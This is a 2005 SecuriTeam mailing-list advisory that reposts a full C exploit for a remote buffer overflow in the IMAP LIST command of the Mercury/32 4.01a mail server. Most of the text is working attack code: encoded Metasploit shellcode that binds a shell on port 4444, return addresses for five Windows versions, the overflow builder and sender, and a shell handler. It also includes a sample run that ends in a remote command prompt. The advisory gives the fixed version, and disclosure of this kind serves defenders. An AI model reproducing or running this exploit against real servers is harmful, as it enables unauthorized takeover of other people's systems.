[EXPL] Mercury/32 Mail Buffer Overflow (LIST, Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Mercury/32 Mail Buffer Overflow (LIST, Exploit)
------------------------------------------------------------------------

SUMMARY

Mercury is "a free, standards-based mail server solution, providing
comprehensive, fast server support for all major Internet e-mail
protocols. It is supplied in two versions, one hosted on Windows systems,
the other running as a set of NLMs on Novell NetWare file servers".

This exploit binds shell on port 4444, by exploiting previously reported
buffer overflow vulnerability in Mercury Mail.

DETAILS

Vulnerable Systems:
* Mercury/32 version 4.01a

Immune Systems:
* * Mercury/32 version 4.01b and later

/*
Mercury imap4 server remote buffer overflow exploit
author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
package : Mercury mail transport system 4.01a and prolly prior
workaround : upgrade to 4.01b version
advisory : not available right now
company address : www.pmail.com
timeline :
15 Sep 2005 : vulnerability reported by securiteam mailing list
20 Sep 2005 : IHS exploit released
exploit features :
1) 5 working targets including win2k , winxp , win2k3
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars are : 0x20 0x0a
compiled with visual c++ 6 : cl mercury_imap.c
greeting to :
www.ihsteam.com the team , LorD and NT heya
www.ihsteam.net english version ,
www.exploitdev.com Jamie and Ben the two good brothers also my
brothers
www.metasploit.com when are you gonna release the newer version :P ?
www.class101.org class with his new laptop :>
www.milw0rm.com str0ke , I am sending it to you first dont doubt
:d
www.c0d3r.org study time started :((( , pitty for the c0d3r !
shout to actionspider
read these lines and try to understand ( I know you cant akhey ) that
an script kiddie (defacer) never ever could be compared to an exploit
coder
try to grow , being grown up is not related to age -- with respects
/*
/*

D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc

-------- mercury imap remote BOF exploit by c0d3r

[+] target : windows 2003 server enterprise service pack 1
[+] building login data
[+] building overflow string
[+] attacking host ihs
[+] packet size = 625 byte
[+] connected
[+] sending login info
[+] sending exploit string
[+] exploit sent successfully to ihs
[+] trying to get shell
[+] connecting to ihs on port 4444
[+] target exploited successfully
[+] Dropping into shell

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

H:\MERCURY>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 625
// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1

// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub
// bad chars : 0x00 0x0a 0x20 0x0d

char shellcode[]=
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92"
"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4"
"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0"
"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2"
"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13"
"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0"
"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0"
"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b"
"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb"
"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39"
"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68"
"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda"
"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53"
"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72"
"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c"
"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b"
"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16"
"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4"
"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a"
"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb"
"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64"
"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b";

void gotshell (int newsock);
unsigned int rc,sock,os,addr,rc2 ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
char point_esp[5];
unsigned short port;
char req1[] = "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E";
char req2[] = "\x30\x30\x30\x31";
unsigned char *login,*exploit;
char vuln_command[] = "\x4C\x49\x53\x54";
// jmp esp in ntdll
char winxpsp1[] = "\xCC\x59\xFB\x77";
// jmp esp (not tested)
char winxpsp2[] = "\xED\x1E\x94\x7C";
// call esp in kernel32.dll
char win2ksp4[] = "\x23\xde\xaf\x01";
// jmp esp in ntdll
char win2k3_sp0[] = "\xAB\x8B\xFB\x77";
// push esp - ret in kernel32
char win2k3_sp1[] = "\x6A\xFA\xE8\x77";

int main (int argc, char *argv[])
{

if(argc < 6)
{
printf("\n-------- mercury imap remote BOF exploit by c0d3r\n");
printf("-------- usage : imap.exe host port target username
password\n");
printf("-------- target 1 : windows xp service pack 1 : 0\n");
printf("-------- target 2 : windows xp service pack 2 : 1\n");
printf("-------- target 3 : windoes 2k advanced server sp 4 : 2\n");
printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n");
exit(-1) ;
}
printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(point_esp,winxpsp1);
printf("[+] target : windows xp service pack 1\n");
break;
case 1:
strcat(point_esp,winxpsp2);
printf("[+] target : windows xp service pack 2\n");
break;
case 2:
strcat(point_esp,win2ksp4);
printf("[+] target : windows 2000 advanced server service pack 4\n");
break;
case 3:
strcat(point_esp,win2k3_sp0);
printf("[+] target : windows 2003 server enterprise service pack 0\n");
break;
case 4:
strcat(point_esp,win2k3_sp1);
printf("[+] target : windows 2003 server enterprise service pack 1\n");
break;
default:
printf("\n[-] this target doesnt exist in the list\n\n");

exit(-1);
}

printf("[+] building login data\n");
login = malloc(256);
memset(login,0,256);
sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]);

// Creating heart of exploit code 4 5

printf("[+] building overflow string");

memset(buffer,NOP,size);
memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
memcpy(buffer+280,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
exploit = malloc(1000);
memset(exploit,0,1000);
sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer);

// EO heart of exploit code

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
Sleep(1500);
if (!hp)
{
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;

if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);

printf("\n[+] attacking host %s\n" , argv[1]) ;

Sleep(1000);

printf("[+] packet size = %d byte\n" , sizeof(buffer));

rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{

Sleep(1500) ;
printf("[+] connected\n") ;
printf("[+] sending login info\n") ;
send(sock,login,strlen(login),0);
Sleep(1500);
printf("[+] sending exploit string\n") ;
send(sock,exploit,strlen(exploit),0);
Sleep(1500);
printf("[+] exploit sent successfully to %s \n" , argv[1]);
printf("[+] trying to get shell\n");
printf("[+] connecting to %s on port 4444\n",argv[1]);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
Sleep(1500);
if (!sock)
{
printf("[-] socket() error...\n");
exit(-1);
}
tcp.sin_family = AF_INET;
tcp.sin_port=htons(4444);
rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct
sockaddr_in));
if(rc2 != 0)
{
printf("[-] exploit probably failed\n");
exit(-1);
}
if(rc2==0)
{
printf("[+] target exploited successfully\n");
printf("[+] Dropping into shell\n\n");
gotshell(sock);
}
}

else
{
printf("[-] ouch! Server is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}

void gotshell(int new_sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char bufferx[1000];

tv.tv_sec = 1;
tv.tv_usec = 0;

while (1)
{

o[0] = 1;
o[1] = new_sock;

length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (new_sock, bufferx, sizeof (bufferx), 0);
if (length <= 0)
{
printf ("[-] Connection closed.\n");
WSACleanup();
return;
}
length = write (1, bufferx, length);
if (length <= 0)
{
printf("[-] Connection closed.\n");
WSACleanup();
return;
}
}
else
{
length = read (0, bufferx, sizeof (bufferx));
if (length <= 0)
{
printf("[-] Connection closed.\n");
WSACleanup();
return;
}
length = send(new_sock, bufferx, length, 0);
if (length <= 0)
{
printf("[-] Connection closed.\n");
WSACleanup();
return;
}
}
}
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:c0d3r@ihsteam.com> c0d3r.
Related advisory:
<http://www.securiteam.com/securitynews/5TP0D0UGVO.html>
http://www.securiteam.com/securitynews/5TP0D0UGVO.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.